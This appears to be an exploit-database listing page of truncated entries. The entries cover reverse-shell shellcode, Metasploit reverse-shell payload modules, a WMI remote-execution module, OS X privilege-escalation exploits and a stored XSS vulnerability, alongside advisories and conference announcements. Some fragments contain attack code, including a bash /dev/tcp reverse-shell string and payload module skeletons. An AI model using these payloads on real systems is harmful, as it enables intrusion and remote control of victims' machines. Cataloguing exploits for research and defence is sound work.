ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure

Introduction to the PoC : ====================================================================== In this distribution, the managment website is a binary file named "kerbynet" interpreted in cgi-bin directory here : /cdrom/usr/local/apache2/cgi-bin/kerbynet So all url look like this :...

Linux/x86 Multi-Egghunter shellcode

/ Title: Multi-Egghunter Author: Ryan Fenno @ryanfenno Date: 20 September 2013 Tested on: Linux/x86 Ubuntu 12.0.3 Description: This entry represents an extension of skape's sigaction2 egghunting method 1 to multiple eggs. It is similar in spirit to BJ 'SkyLined' Wever's omelet shellcode for Win32...

Linux/ARM - reverse_shell (tcp,10.1.1.2,0x1337)

/ Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve"/bin/sh", 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l - Raspberry Pi Author: midnitesnake / Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve"/bin/sh", 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on:...

Windows Management Instrumentation (WMI) Remote Command Execution

This module executes powershell on the remote host using the current user credentials or those supplied. Instead of using PSEXEC over TCP port 445 we use the WMIC command to start a Remote Procedure Call on TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel traffic through that...

Debian Security Advisory DSA 2532-1 (libapache2-mod-rpaf - denial of service)

Sebastien Bocahu discovered that the reverse proxy add forward module for the Apache webserver is vulnerable to a denial of service attack through a single crafted request with many headers. OpenVAS Vulnerability Test $Id: deb25321.nasl 8972 2018-02-28 07:02:10Z cfischer $ Auto-generated from...

Command Shell, Reverse TCP SSL (via nodejs)

Creates an interactive shell via nodejs, uses SSL This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 831 include Msf::Payload::Single include Msf::Payload::NodeJS include...

Command Shell, Reverse TCP (via nodejs)

Creates an interactive shell via nodejs This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework It would be better to have a commonjs payload, but because the implementations differ so greatly when it comes to require paths f...

Windows Command Shell, Reverse TCP (via Lua)

Creates an interactive shell via Lua This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 224 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def initializeinfo ...

DefCamp 2013 - International Hacking and Information Security Conference in Romania

The Fourth Edition of an International Information Security Conference hosted in Romania , The DefCamp 2013 is now open for Call for Papers. Over 300 Security experts, Researchers, and Enthusiasts from Romania and neighboring countries are expected to take part in the event in Bucharest, at the...

DefCamp 2013 - International Hacking and Information Security Conference in Romania

The Fourth Edition of an International Information Security Conference hosted in Romania , The DefCamp 2013 is now open for Call for Papers. Over 300 Security experts, Researchers, and Enthusiasts from Romania and neighboring countries are expected to take part in the event in Bucharest, at the...

WordPress Plugin w3-total-cache Stored XSS Vulnerability

Exploit for php platform in category web applications Steps to Produce the Vulnerability : 1 Go to Dashboard. 2 Click on Installed Plugins. 3 Go to W3-Total-Cache Plugin and Click on settings. 4 Go to Reverse Proxy and Click on page cache settings. 5 Go to Cache Preload and Type Vector - ". in...

OSX <= 10.8.4 - Local Root Priv Escalation (py)

No description provided by source. !/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX = 10.8.4 Local Root Priv Escalation Root Reverse Shell Date: 08-27-2013 Exploit Author: David...

Amazon Linux AMI : httpd (ALAS-2012-46)

It was discovered that the fix for CVE-2011-3368 did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI...

Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python)

Apple Mac OSX 10.8.4 - Local Privilege Escalation Python !/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s 0&1 &\n" % ipaddr,port pri...

Apple Mac OSX 10.8.4 - Local Privilege Escalation

!/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s 0&1 &\n" % ipaddr,port print """...

OSX <= 10.8.4 - Local Root Priv Escalation (py)

Exploit for iOS platform in category local exploits !/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s...

Mac OS X 10.8.4 Local Privilege Escalation

!/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s 0&1 &\n" % ipaddr,port...

Researchers Reverse Engineer Dropbox

Researchers have cracked open cloud storage service Dropbox, reverse engineering the encryption protecting the client in order to open it up to further security analysis. The engineers, Dhiru Kholia of Openwall and Przemyslaw Wegrzyn of CodePainters, also managed to demonstrate how to use...

[Xenotix XSS Exploit Framework v4] Advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework

OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting XSS vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine Trident, WebKit, and Gecko embedded scanner. It is claimed to have the world’s 2nd...

[The Backdoor Factory] Backdoors win32 PE files

Backdoors win32 PE files, to continue normal file execution if the shellcode supports it, by patching the exe/dll directly. Some executables have built in protections, as such this will not work on all PE files. It is advisable that you test target PE files before deploying them to clients or usi...